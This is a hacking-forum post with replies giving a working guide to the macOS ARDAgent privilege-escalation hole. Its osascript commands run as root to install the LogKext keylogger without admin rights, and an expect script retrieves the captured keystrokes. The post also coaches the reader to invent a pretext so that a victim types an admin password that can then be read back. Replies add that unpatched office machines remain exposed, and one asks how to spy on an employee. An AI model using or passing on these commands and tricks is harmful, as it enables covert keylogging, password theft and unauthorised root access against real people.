ARDAgent Exploit

Installing LogKext without admin


Run this to install it (you need to change path)


CODE
osascript -e 'tell app "ARDAgent" to do shell script "[ $(whoami) = root ] && /usr/sbin/installer -package /path/to/logKext.pkg -target /
"'

make a plain text file called "expect.sh" containing this (.sh stands for shell script)


CODE
spawn logKextClient
expect "logKext Password:"
send "logKext\r"
expect "logKextClient"
send "open\r"
expect "logKextClient"
send "exit\r"


Then run this AFTER you have typed what you want captured.
(change path)


osascript -e 'tell app "ARDAgent" to do shell script "expect /PATH/TO/expect.sh"';



Then it will open a txt file containing the captured text but its not super recent like 50 Characters behind. So if you want to get someones password, type something in before like EGS3F, then have them come type in their password for admin. Make up a reason why they have to type it in. (this guide is written for if you don't have admin pass) Say thank you :]. Then just type around so it will be at least 50 characters in. Then run the command above and search for EG3SF and look for what was typed right after that.


thnx to TSF

MORE SECURITY THREADS

-pip0

Lastest security update fixes this hole

Very nice trik

-berz3k.

Lastest security update fixes this hole

WTF, Is there a legal keylogger i can use? I need to spy on my employee..

very nice guide! Ty

Nice sploit, we had one around here somwhere which used this hole to steal hashs, i dunno where it is atm.
Sure the hole s closed but I can tell you most of the boxes these days lack updates ... especially in offices.

There was a question for a legal keylogger, keylogging your emploies is always a criminal offend in most of the countries unless they were told you do so and even than it might violate their privacy rights.